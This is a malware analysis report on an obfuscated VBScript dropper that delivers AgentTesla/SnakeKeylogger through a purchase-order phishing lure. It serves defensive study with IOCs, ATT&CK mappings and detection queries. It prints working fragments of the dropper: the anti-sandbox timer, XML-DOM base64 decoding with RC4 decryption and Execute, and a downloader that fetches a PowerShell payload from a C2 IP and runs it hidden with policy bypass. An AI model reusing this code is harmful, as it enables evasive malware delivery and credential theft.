highPhishing

AgentTesla/SnakeKeylogger — Multi-Layer VBScript Dropper (PO_20981.vbe)

PublishedMarch 12, 2026

Threat Actors:### Delivery MechanismAssessment

phishingagentteslasocial-engineeringc2aptspearphishing

Executive Summary

This sample is a heavily obfuscated VBScript dropper (PO_20981.vbe) distributed with a Purchase Order social engineering lure. The file employs a sophisticated three-layer obfuscation chain to evade static detection: (1) an outer VBScript layer that concatenates 1,322 fragmented base64 chunks, applies 539 Replace() passes to strip embedded noise tokens, and RC4-decrypts the resulting binary using key FHFCDCadRR&&^%$#; (2) an in-memory VBScript second stage that builds an obfuscated download URL character-by-character, downloads a PowerShell script from http://192.210.186.208/web/ENCRYPT.Ps1, and executes it with policy bypass; and (3) the third-stage PowerShell payload (assessed to be AgentTesla or SnakeKeylogger based on TrendMicro telemetry TrojanSpy.VBS.SNAKEKEYLOGGER.SM and the abuse.ch AgentTesla tag). The C2 server (192.210.186.208) is hosted on ColoCrossing (ASN 36352, US) and flagged as malicious by 11 VirusTotal vendors including Kaspersky, Fortinet, and SOCRadar. The server exposes ports 80, 443, 445, and 5985 with multiple critical CVEs. Anti-sandbox evasion uses a 2.2-second timer loop before payload decryption.

Sample Metadata

Field	Value
SHA-256	`337e2b2a81e09ae37d00a94596d965c1a2782d5e5ad27704b8597d1d11a7a00f`
MD5	`c1aa056379f7b130413716aff900e70d`
SHA-1	`28ce60ea3d4acff44c4b397c27acf2af05809094`
Filename	`PO_20981.vbe`, `c1aa056379f7b130413716aff900e70d.vbe`
File Type	VBScript (text/plain, `.vbe` extension)
File Size	51,702 bytes (600 lines)
First Seen	2026-03-12 15:47:14 UTC
Reporter	abuse.ch
VT Detections	26 / 62
Threat Family Tags	AgentTesla, VBS dropper, SnakeKeylogger
Notable AV Labels	`TrojanSpy.VBS.SNAKEKEYLOGGER.SM` (TrendMicro), `VBS/Agent.TVK` (ESET), `ISB.Dropper!gen1` (Symantec), `Trojan.GenericKD.79688875` (BitDefender/VIPRE)

Static Analysis

File Structure

The .vbe extension normally indicates VBScript Encoded (using Microsoft Script Encoder), but this file is actually plaintext VBScript — the .vbe extension is used as a social-engineering artifact and to associate with wscript.exe on Windows. The file contains 600 lines and is structured in two logical sections:

Stage 1 Loader (lines 1–571): Obfuscated payload delivery via RC4-encrypted, base64-encoded, noise-polluted data
Execution (lines 574–600): XML COM object base64 decode + RC4 decrypt + Execute()

Anti-Sandbox Evasion

Dim startTick, elapsedTick
startTick = Timer
Do
    elapsedTick = Timer - startTick
    If elapsedTick < 0 Then elapsedTick = elapsedTick + 86400
Loop Until elapsedTick >= 2.2

The script opens with a 2.2-second timer loop before any payload activity. This evades sandboxes with short execution timeouts. The midnight-crossing correction (+ 86400) shows careful implementation.

Obfuscation Layer 1: Junk Code

Lines 1–7 include dead code with no runtime effect:

Dim tempVal : tempVal = 100 : For cnt = 1 To 3 : tempVal = tempVal * cnt : Next
If 1 = 0 Then WScript.Echo "Hidden message" : End If

Obfuscation Layer 2: Fragmented Base64 with Noise Tokens

Line 19 contains 1,322 base64 chunks concatenated into fullBase64. Each chunk is 10 characters. Embedded throughout are hex-encoded noise tokens (e.g., 7B307D, 21215448454E2121, 4040494E414040) that act as sentinels. Lines 33–571 (539 Replace() calls) strip all noise tokens, leaving clean base64. Example noise tokens and their hex values:

Token Pattern (Hex)	Decoded Text
`7B307D`	`{0}`
`21215448454E2121`	`!!THEN!!`
`21214F5A4B542121`	`!!OZKT!!`
`4040494E414040`	`@@INA@@`
`2323424D49474A2323`	`##BMIGJ##`

Obfuscation Layer 3: RC4 Decryption

Set xmlDoc = CreateObject("Microsoft.XMLDOM").createElement("base64")
xmlDoc.dataType = "bin.base64"
xmlDoc.text = fullBase64
encryptedData = xmlDoc.nodeTypedValue

decryptedData = RC4Decrypt(encryptedData, "FHFCDCadRR&&^%$#")
Execute decryptedData

Decode method: Microsoft XML DOM bin.base64 dataType (avoids System.Convert to evade detection)
Cipher: RC4 (custom implementation in lines 580–597)
Key: FHFCDCadRR&&^%$#
Output size: 2,655 bytes of VBScript executed in-memory via Execute()

Decrypted Stage 2 VBScript

The decrypted second stage is a downloader VBScript with the following notable characteristics:

URL obfuscation (character-by-character concatenation):

url = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "1" & "9" & "2" & "." & "2" & "1" & "0" & "." & "1" & "8" & "6" & "." & "2" & "0" & "8" & "/" & "w" & "e" & "b" & "/" & "E" & "N" & "C" & "R" & "Y" & "P" & "T" & "." & "P" & "s" & "1"

Resolves to: http://192.210.186.208/web/ENCRYPT.Ps1

Execution chain:

Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", url, False
xhr.Send
' Writes response to C:\Temp\<RANDOM8>.ps1
shell.Run "powershell.exe -nop -ep bypass -file """ & psFile & """", 0, True

Key behaviors:

Creates C:\Temp\ if it does not exist
Generates an 8-character random uppercase filename (e.g., KFXJRMQB.ps1) to defeat static path-based detection
Downloads stage 3 via synchronous HTTP GET using MSXML2.XMLHTTP
Executes with shell.Run ..., 0, True — hidden window (0), waits for completion (True)
Uses -nop (no profile), -ep bypass (execution policy bypass)
Cleanup() is a stub — file is not deleted after execution (stage 3 remains on disk)

Behavioral Analysis

Full Execution Chain

User opens PO_20981.vbe
  → WScript.exe executes VBScript
    → Anti-sandbox: 2.2-second sleep
    → 1,322 base64 chunks concatenated
    → 539 Replace() noise removals
    → XML DOM base64 decode → binary blob
    → RC4 decrypt (key: FHFCDCadRR&&^%$#)
    → Execute() runs Stage 2 VBScript in-memory
      → Creates C:\Temp\ (if needed)
      → Generates random .ps1 filename
      → HTTP GET http://192.210.186.208/web/ENCRYPT.Ps1
      → Writes PowerShell to C:\Temp\<RANDOM8>.ps1
      → powershell.exe -nop -ep bypass -file <path>  [hidden window]
        → Stage 3: AgentTesla/SnakeKeylogger PowerShell
          → Credential harvesting, keylogging, SMTP exfiltration

Assessed Stage 3 Capabilities (AgentTesla/SnakeKeylogger)

Based on the filename ENCRYPT.Ps1, threat family tags, and TrendMicro detection TrojanSpy.VBS.SNAKEKEYLOGGER.SM:

Capability	Description
Keylogging	Captures keystrokes via Windows API hooks
Credential harvesting	Extracts credentials from browsers, email clients, FTP clients
Screenshot capture	Periodic desktop screenshots
Clipboard monitoring	Captures clipboard contents
SMTP exfiltration	Sends stolen data via SMTP to attacker-controlled mailbox
Persistence	Registry run keys or scheduled task creation
Anti-analysis	Obfuscated .NET assembly, in-memory execution

Network Indicators

C2 Server: 192.210.186.208

Field	Value
IP Address	`192.210.186.208`
Hostname	`192-210-186-208-host.colocrossing.com`
ASN	AS36352 (ColoCrossing / HostPapa)
Country	United States
VT Reputation	11/94 malicious (Kaspersky, Fortinet, CyRadar, SOCRadar, CRDF, Criminal IP, Cluster25, alphaMountain.ai, ADMINUSLabs, Forcepoint, Webroot)
SOCRadar Tag	phishing
Open Ports	80 (HTTP), 443 (HTTPS), 445 (SMB), 5985 (WinRM)
Software	Apache 2.4.58, PHP 8.2.12, OpenSSL 3.1.3, jQuery 1.10.2
TLS Certificate	Self-signed

Notable CVEs on C2 Server

CVE	Description	Severity
CVE-2024-4577	PHP CGI argument injection (RCE)	Critical
CVE-2020-0796	SMBGhost — Windows SMB RCE	Critical
CVE-2024-36387	Apache HTTP Server null pointer dereference	High
CVE-2024-38472–38477	Apache HTTP Server SSRF / bypass / redirect	High
CVE-2023-38709	Apache HTTP Server response splitting	Medium

Stage 3 Delivery URL

URL	Protocol	Purpose
`http://192.210.186.208/web/ENCRYPT.Ps1`	HTTP/80	Stage 3 PowerShell payload delivery

MITRE ATT&CK TTPs

Tactic	Technique	ID	Notes
Initial Access	Spearphishing Attachment	T1566.001	`PO_20981.vbe` — Purchase Order lure
Execution	User Execution: Malicious File	T1204.002	User must open/run the .vbe file
Execution	Command and Scripting Interpreter: Visual Basic	T1059.005	VBScript dropper (both stages)
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	Stage 3 executed via powershell.exe -ep bypass
Defense Evasion	Obfuscated Files or Information	T1027	Base64 + RC4 + 539 noise token removals
Defense Evasion	Obfuscated Files or Information: Command Obfuscation	T1027.010	Character-by-character URL concatenation
Defense Evasion	Virtualization/Sandbox Evasion: Time Based Evasion	T1497.003	2.2-second timer sleep
Defense Evasion	Execution Guardrails	T1480	Timer ensures sandbox timeout before payload
Defense Evasion	Modify Registry	T1112	Assessed: stage 3 persistence via registry
Command and Control	Ingress Tool Transfer	T1105	Downloads ENCRYPT.Ps1 from C2
Command and Control	Application Layer Protocol: Web Protocols	T1071.001	HTTP GET to C2 on port 80
Collection	Input Capture: Keylogging	T1056.001	AgentTesla/SnakeKeylogger capability
Collection	Screen Capture	T1113	AgentTesla/SnakeKeylogger capability
Collection	Clipboard Data	T1115	AgentTesla/SnakeKeylogger capability
Credential Access	Credentials from Password Stores	T1555	Browser/email credential harvesting
Exfiltration	Exfiltration Over C2 Channel	T1041	SMTP/HTTP exfiltration
Persistence	Boot or Logon Autostart Execution: Registry Run Keys	T1547.001	Assessed: stage 3 persistence

IOCs

File Indicators

Type	Value	Notes
SHA-256	`337e2b2a81e09ae37d00a94596d965c1a2782d5e5ad27704b8597d1d11a7a00f`	Stage 1 VBScript dropper
MD5	`c1aa056379f7b130413716aff900e70d`	Stage 1 VBScript dropper
SHA-1	`28ce60ea3d4acff44c4b397c27acf2af05809094`	Stage 1 VBScript dropper
Filename	`PO_20981.vbe`	Phishing delivery filename
Path	`C:\Temp\*.ps1`	Stage 3 PS1 drop location
Path	`C:\Temp\`	Created staging directory
File pattern	`C:\Temp\[A-Z]{8}.ps1`	Random-named stage 3

Network Indicators

Type	Value	Notes
IP Address	`192.210.186.208`	C2 server (ColoCrossing US)
URL	`http://192.210.186.208/web/ENCRYPT.Ps1`	Stage 3 PowerShell payload URL
Hostname	`192-210-186-208-host.colocrossing.com`	C2 reverse DNS
ASN	`AS36352`	ColoCrossing / HostPapa
Port	`80/tcp`	C2 HTTP delivery
Port	`5985/tcp`	WinRM (potential lateral movement vector on C2)

Behavioral / String Indicators

Type	Value	Notes
RC4 Key	`FHFCDCadRR&&^%$#`	Decrypts stage 2 from stage 1
VBS noise token	`7B307D`	Hex-encoded noise injected in base64
UserAgent	`MSXML2.XMLHTTP` default	HTTP download via COM object
Process	`powershell.exe -nop -ep bypass -file`	Stage 3 launcher command pattern
COM object	`Microsoft.XMLDOM`	Used for base64 decode
COM object	`MSXML2.XMLHTTP`	Used for C2 HTTP GET
COM object	`WScript.Shell`	Used for process execution
COM object	`Scripting.FileSystemObject`	Used for file operations

Campaign Context and Attribution

Delivery Mechanism

The filename PO_20981.vbe (Purchase Order + number) is a classic Business Email Compromise (BEC) or spear-phishing lure. AgentTesla and SnakeKeylogger are frequently distributed via .vbe droppers in campaigns targeting manufacturing, logistics, and finance sectors, typically delivered via email attachments impersonating purchase orders, invoices, or shipping notifications.

Threat Actor Assessment

Assessment	Confidence	Notes
AgentTesla campaign	High	Tagged by abuse.ch, TrendMicro SNAKEKEYLOGGER SM detection, ENCRYPT.Ps1 naming
Commercial crimeware	High	Both AgentTesla and SnakeKeylogger are sold/rented as commodity RAT/stealer tools
Attribution to specific TA	Low	Insufficient data; consistent with numerous financially-motivated threat actors
Infrastructure sharing	Medium	ColoCrossing IP space commonly abused by multiple criminal TA groups

Historical Context

AgentTesla is a .NET-based RAT/keylogger sold as Malware-as-a-Service (MaaS) since 2014, with continued active development. It harvests credentials from 70+ applications.
SnakeKeylogger (aka 404 Keylogger) is a .NET stealer active since late 2020, with functionality overlapping AgentTesla.
Multi-layer VBScript dropper chains with RC4-encrypted payloads and timer-based evasion are a consistent TTP in AgentTesla delivery campaigns observed in 2024–2026.

Detection Recommendations

Endpoint Detection

Block .vbe email attachments at the email gateway — VBScript Encoded files have negligible legitimate use.
Alert on wscript.exe spawning powershell.exe with -ep bypass — this child process relationship is a high-fidelity indicator.
Alert on powershell.exe with -nop -ep bypass -file C:\Temp\ — execution from C:\Temp\ with bypass flags is highly suspicious.
Monitor MSXML2.XMLHTTP COM object creation by script interpreters — script-based HTTP downloads are rarely legitimate.
Block execution from C:\Temp\ via AppLocker/WDAC policies.
Alert on wscript.exe processes exceeding 3 seconds wall time before network activity — may indicate timer-based anti-sandbox.

Network Detection

Block outbound HTTP to 192.210.186.208 on all egress paths.
Alert on HTTP GET requests matching */web/ENCRYPT.Ps1 (case-insensitive).
Alert on HTTP GET requests for *.Ps1 files from non-browser user agents.
Block ASN 36352 (ColoCrossing) for high-risk environments.

YARA and Signature Rules

See accompanying yara_rules.yar and suricata.rules files.

Hunting Queries (Pseudo-SPL/KQL)

# Splunk: WScript spawning PowerShell with bypass
index=endpoint sourcetype=sysmon EventCode=1
  ParentImage="*wscript.exe"
  CommandLine="*-ep bypass*"

# Splunk: PowerShell executing from C:\Temp\ with bypass
index=endpoint sourcetype=sysmon EventCode=1
  Image="*powershell.exe"
  CommandLine="*-nop*bypass*C:\\Temp\\*"

# KQL (Defender): wscript parent + powershell child
DeviceProcessEvents
| where InitiatingProcessFileName =~ "wscript.exe"
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has "-ep bypass"